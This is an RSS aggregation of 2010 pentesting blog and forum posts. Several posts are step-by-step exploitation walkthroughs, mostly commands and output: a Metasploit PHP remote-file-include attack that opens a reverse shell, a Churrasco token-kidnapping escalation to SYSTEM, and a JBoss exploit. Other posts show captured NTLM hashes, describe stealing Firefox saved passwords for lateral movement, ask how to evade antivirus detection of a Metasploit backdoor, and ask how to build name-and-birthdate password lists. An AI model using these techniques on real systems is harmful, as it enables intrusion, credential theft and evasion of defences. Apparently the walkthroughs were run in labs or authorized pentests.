RSS Feed » Tags » Pentesting

remote-exploit: Trapping attackers with honey-walls?

manoj9372 — Tue, 24 Aug 2010 06:00:32 -0600

I had read about the following
1)honey-pots(low interaction and high interaction honey-pots)
2)honey-nets(network of honey-pot's)
3)honey-walls!!(combination of honey-pot + firewall +router +gateway)

I had downloaded some low interaction honeypot system and used it,But i didn't know how can i set-up honey nets or honey-walls
and it's configuration etc..
did you guys have any experience with honey-nets and honey walls and high interaction honey-pots?
If yes can any body tell me where can i learn about them?

and also i heared it is hars for the attackers to detect a honey-wall,because it act as a multi purpose device,So according to me they can not detect it easily ..

I tried on google i ended up with only theory,so decided to ask here...
Hope i will get some ideas here...

remote-exploit: ssh private key passphrase

The_Tiger — Tue, 27 Jul 2010 07:31:37 -0600

Helle there,

my question is quite short (hopefully the answer is longer^^).

Does anybody know a application to recover a "ssh-private-key-passphrase", to know how strong it is?

greets,

carnal0wnage: Revisiting HALFLM Stuff

CG — Thu, 01 Jul 2010 10:56:00 -0600

I covered some of the halflm challenge sniffing stuff in a previous post.

but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.

so here are some updated links.

where to grab the tables:

[freerainbowtables.mirror.garr.it]

where to grab the program:

[sourceforge.net]

Some gotchas I ran into on the last PT was some reason getting odd hashes in the SMB and NTLM sniffing modules.

in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get smb_login scanned, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5

carnal0wnage: more with rpcclient

CG — Wed, 30 Jun 2010 20:11:00 -0600

Got asked to help remotely locate local admins on boxes on a network.

rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]

rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

Now you would think that doing a querygroup would give you the right output, but actually you get a:

rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP

Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.

Anyway it takes one more step but you can do it this way:

rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]

rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]

Then you can look up who those SIDs belong to

rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]

rpcclient $> lookupsids S-1-5-21-1214440339- 1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PCAdministrator (1)

rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PCuser (1)

rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine 192.168.242.128 pipe lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT

Not sure about the 512 (its a MS built-in account I think) but the 1003 was the user I added to the local admins group.

carnal0wnage: Firefox Saved Passwords

CG — Mon, 28 Jun 2010 12:58:00 -0600

Nothing earth shattering, but since this is a place for my notes...

Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.

So how to do it?

Actually its simple. Inside of the mozillafirefox directory will be somethingrandom.default. Inside that folder you'll find:

key3.db
signons.sqlite

If there is no master password set, all you have to do is replace those two files with the ones on your test VM, open firefox, go to preferences, security, and do a view saved passwords.

I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...

-thanks to Mubix for telling me about this.

remote-exploit: Stiegg larsson's asphyxia

bwana — Sun, 13 Jun 2010 11:01:36 -0600

In the millennium series by stiegg larsson, a talented pc user named WASP designs and implements an app named asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute or a single event.

The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?

Getting back to the point though-does anyone have insight into this idea?

carnal0wnage: Using the Metasploit PHP Remote File Include Module

CG — Tue, 11 May 2010 20:19:00 -0600

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

let's see it in action

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
hdm
egypt

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: [192.168.6.140:8080] 
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg  header.inc.php license.txt slog_users.txt  version.txt
1.jpeg  index.asp old  slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)

carnal0wnage: Playing with the MS09-012 Windows Local Exploit

CG — Mon, 10 May 2010 08:29:00 -0600

Back in 09 there was a buzz about token kidnapping by Argeniss
[www.argeniss.com]

[www.argeniss.com]

subsequently patched [www.microsoft.com]

I'm normally violently against uploading binaries to boxes but until the functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.

[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITYNETWORK SERVICE
meterpreter > pwd
c:windowssystem32inetsrv

Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.

meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:windowssystem32inetsrv>cd C:Inetpubwwwroot
C:Inetpubwwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:Inetpubwwwroot

05/10/2010  06:53 AM              .
05/10/2010  06:53 AM              ..
05/10/2010  06:53 AM           410,624 Churrasco.bin
02/21/2003  06:48 PM             1,433 iisstart.htm
05/10/2010  07:19 AM            37,888 shell.bin
05/10/2010  07:43 AM               173 test4.asp;.txt
             4 File(s)      2,105,685 bytes
              2 Dir(s)  36,227,641,344 bytes free

Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah

C:Inetpubwwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM

on the multi/handler side...

[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:Inetpubwwwroot>whoami
whoami
nt authoritysystem

C:Inetpubwwwroot>^Z
Background session 1? [y/N]  y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

 Id  Type         Information                           Connection
 --  ----         -----------                           ----------
 1   shell        Microsoft Windows [Version 5.2.3790]  192.168.6.94:443 -> 192.168.6.94:62854
 2   meterpreter  NT AUTHORITYSYSTEM @ LAB          192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

carnal0wnage: Metasploit jboss deployment file repository exploit

CG — Sun, 09 May 2010 09:24:00 -0600

MC pushed out a new exploit today (jboss_deploymentfilerrepository)
so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)

msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:Documents and SettingsAdministratorDesktopjboss-6.0.0.M1jboss-6.0.0.M1bin>whoami
whoami
win2k3labadministrator

C:Documents and SettingsAdministratorDesktopjboss-6.0.0.M1jboss-6.0.0.M1bin>^Z
Background session 3? [y/N]  y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
3   shell               192.168.1.101:4444 -> 192.168.1.101:57796

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type         Information                                      Connection
--  ----         -----------                                      ----------
3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796
4   meterpreter  win2k3labAdministrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3labAdministrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > pwd
C:Documents and SettingsAdministratorDesktopjboss-6.0.0.M1jboss-6.0.0.M1bin
meterpreter >

carnal0wnage: Layer Four Traceroute

CG — Thu, 06 May 2010 21:22:00 -0600

Layer Four Traceroute (lft) http://pwhois.org/lft

If you are using the one bundled with your distro you are probably missing out some of the more interesting and new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

Its been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organization's send all (or some)web traffic through.

It also handy that you can throw it some switches to show the AS and network routes with the scan as well.

Old Traceroute:

cg@meh:~/evil/lft-3.1$ traceroute www.microsoft.com
traceroute to www.microsoft.com (65.55.21.250), 30 hops max, 60 byte packets
1 192.168.1.1 (192.168.1.1) 4.681 ms 5.794 ms 14.193 ms
2-8 Local Stuff
9 pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 35.743 ms 36.391 ms 37.102 ms
10 as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 173.747 ms 174.136 ms 175.054 ms
11 209.240.199.162 (209.240.199.162) 32.762 ms 33.703 ms 37.096 ms
12 ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 17.652 ms 28.151 ms 24.033 ms
13 ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 24.864 ms 25.951 ms 26.485 ms
14 ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 109.384 ms 109.615 ms 110.180 ms
15 ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 106.607 ms 107.401 ms 110.382 ms
16 207.46.46.92 (207.46.46.92) 112.458 ms 118.682 ms 106.207 ms
17 10.22.8.14 (10.22.8.14) 107.323 ms 107.552 ms 107.789 ms
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *

Layer Four Traceroute

cg@meh:~/evil/lft-3.1$ sudo lft -rNS www.microsoft.com -d 80
TTL LFT trace to 65.55.21.250:80/tcp
1 [33657] [CMCS] 192.168.1.1 2.3/1.5ms ** [neglected] no reply packets received from TTLs
2 through -8 local stuff
9 [7922] [COMCAST-7922] pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 27.2/26.6ms
10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 209.240.199.162 15.8/24.3ms
12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 34.1/14.8ms
13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 16.0/15.9ms
14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 121.3/98.2ms
15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 114.1/97.3ms
16 [6067] [ONYX] 207.46.46.92 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 10.22.8.14 99.5/109.5ms
18 [AS?] [Net?] [target open] 65.55.21.250:80 98.5/109.4ms

carnal0wnage: Metasploit Lotus Domino Version Scanner

CG — Wed, 05 May 2010 07:36:00 -0600

I pushed out the first of a few Lotus Domino modules I've been working on to the metasploit trunk last nite.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino, old old versions "may" display the version in the server headers but I've never seen anything above 5.x do this. You usually get something like:

[HTTP] 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private
ETag: W/"MTAtODA4NS1DMTI1NzZENjAwMTVGRDhELTAtMA=="

for headers.

Useful enough to identify that its a Domino web server but not so much for using the couple of remote exploits out there that are very version and/or fixpack dependent.

There are a couple of files that the web server may serve up that have version information.

The first being iNotes/FormsX.nsf that usually has the version information as a comment in the html (this can be turned off) and the second being download/filesets/l_LOTUS_SCRIPT.inf
type files that has the base install version (at least as far as I can tell its the base install). *If thats not right please let me know*

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

      Name: Lotus Domino Version
   Version: $Revision$
   License: Metasploit Framework License (BSD)
      Rank: Normal

Provided by:
 CG

Basic options:
 Name     Current Setting  Required  Description
 ----     ---------------  --------  -----------
 PATH     /                yes       path
 Proxies                   no        Use a proxy chain
 RHOSTS                    yes       The target address range or CIDR identifier
 RPORT    80               yes       The target port
 THREADS  1                yes       The number of concurrent threads
 VHOST                     no        HTTP server virtual host

Description:
 Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] 192.168.245.101:80 Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.80.132:80 Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[-] no response for 192.168.80.132:80 download/filesets/l_SEARCH.inf
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[-] 192.168.152.68:80 302 Redirect to [https:] 
[*] Scanned 04 of 20 hosts (020% complete)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] Scanned 06 of 20 hosts (030% complete)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
...

remote-exploit: metasploit > java_ws_arginject_altjvm problem

frozen — Tue, 04 May 2010 05:46:46 -0600

This metasploit module fails to work, if i use it over the internet. In a lan-area it works pretty well.

Code:

msf exploit(java_ws_arginject_altjvm) > exploit

[*] Exploit running as background job.

[-] Handler failed to bind to 95.X.X.X:6113

[*] Started reverse handler on 0.0.0.0:6113

[*] Using URL: hxxp://0.0.0.0:80/

[*]  Local IP: hxxp://192.168.0.5:80/

[*] Server started.

[*] Request for "/" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...

[*] Responding to "GET /3QZOcxOo/" request from 95.X.X.X:60576

[*] Sending js detection HTML to 95.X.X.X:60576...

[*] Responding to "GET /3QZOcxOo/uUW6gpQfujicR.shtml" request from 95.X.X.X:61148

[*] Sending JS version HTML to 95.X.X.X:61148...

[*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042

[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...

[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042

[*] Sending directory multistatus for /3QZOcxOo/ ...

[*] Request for "/3QZOcxOo" does not contain a sub-directory, redirecting to /3QZOcxOo/ ...

[*] Received WebDAV "PROPFIND /3QZOcxOo/" request from 192.168.0.10:1042

[*] Sending directory multistatus for /3QZOcxOo/ ...

[*] Received WebDAV "PROPFIND /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042

[*] Sending DLL multistatus for /3QZOcxOo/jvm.dll ...

[*] Responding to "GET /3QZOcxOo/jvm.dll" request from 192.168.0.10:1042

[*] Sending DLL to 192.168.0.10:1042...

[*] Sending stage (748032 bytes) to 95.X.X.X

[*] Meterpreter session 1 opened (192.168.0.5:6113 -> 95.X.X.X:60066) at 2010-05-04 12:47:22 +0100

same problem as the guy on top (hxxp://blog.metasploit.com/2010/04/java-web-start-argument-injection.html?showComment=1271428170411#c50095338 63542996215 )

jduck answered that this results from a not running WebClient service, but in my test case it is definitely running.

webdav is switching to the internal ip, maybe this is the problem.
Code: [*] Responding to WebDAV "OPTIONS /" request from 192.168.0.10:1042

remote-exploit: vnc payload server settings

eqweo — Sun, 04 Apr 2010 10:01:34 -0600

hi, do you know where can i edit the vnc injection server settings?

defaults settings make a remote vnc connection too slow.

In the client side i tried to connect with xvncviewer editing compression depth and other options but it doesn't change.

Thanks ;)

remote-exploit: metsvc detected

eqweo — Sun, 04 Apr 2010 09:59:18 -0600

hey guys, i can't make metsvc undetected.

i tried to encode it with some crypters but it doesn't work,
so i tried to recompile the source but avira get it every time...then i discover that avira detect the call listen() in the code of metsvc and then mark it as a backdoor!

any suggestion!? what can i do?

thanks

remote-exploit: Merging password tables?

imcookie — Sun, 04 Apr 2010 07:01:55 -0600

i have two password tables:

mens_name.lst
Code:

Aaron

Abdiel

Abdullah

Abel

Abraham

Abram

Adam

Adan

Addison

Aden

Aditya

Adolfo

Adonis

Adrian

Adriel

Adrien

Agustin



...etc

and dob.lst (dates of birth)
Code:

my objective is to merge the two so i have a single list looking like this:

Code:

Aaron25321

Aaron32521

Aaron2531921

Aaron3251921

Aaron1921/25/03

Aaron25/03/1921

Aaron03/25/1921

Aaron25/3/21

..etc

Abdiel25321

Abdiel32521

Abdiel2531921

Abdiel3251921

Abdiel1921/25/03

Abdiel25/03/1921

Abdiel03/25/1921

Abdiel25/3/21

..etc

Abdullah25321

Abdullah32521

Abdullah2531921

Abdullah3251921

Abdullah1921/25/03

Abdullah25/03/1921

Abdullah03/25/1921

Abdullah25/3/21

....etc

If anybody knows how to do this and would like to share the info with i'd be so grateful. I'd also quite happily share the finished product with you :)

regards imcookie

remote-exploit: pcap attack library?

prelate — Thu, 01 Apr 2010 11:37:59 -0600

Does anyone know of a freely available pcap "attack library" which could be run through TCPreplay? Specifically, I'd like the ability to select either specific individual or multiple-simultaneous attacks and send those attacks down the wire.

I've run some searches but haven't come up with anything yet---thought I would post here before I start building it out myself.

Thanks!

remote-exploit: OpenVAS NTV Sync plugin updates

XtremuZ — Thu, 01 Apr 2010 09:36:59 -0600

I'm having a problem updating it
It says "Error: rsync failed. Your NVT collection might be broken now."
Firewall? ..I'm using a domain for downloads, and that's blocking me.. How can i define the proxy in the Konsole, like I had to do on Firefox?

Ty

remote-exploit: 3306/tcp open mysql port unauthorized

logger — Wed, 31 Mar 2010 01:49:02 -0600

In a PEnTest Scenario we have found a open port for for "3306/tcp open mysql port unauthorized" service .
How we can try to connect it remotely.What more further information we can gain using this information

remote-exploit: John wordlist rules help?

Shike — Tue, 30 Mar 2010 19:01:17 -0600

Hey everyone,

I'm a bit new to the use of John the Ripper so please bear with me.

Currently I'm working with wordlist mangling for a class. What I need now is a rule that allows for only some of a single character to be switched.

For example, if I'm using a simple switch rule like this:

so[o0]

it would give me: google, g00gle, etc.

But I need it to also be able to give go0gle, g0ogle, etc.

Is there any rules that can help perform this? Thanks in advance. :)

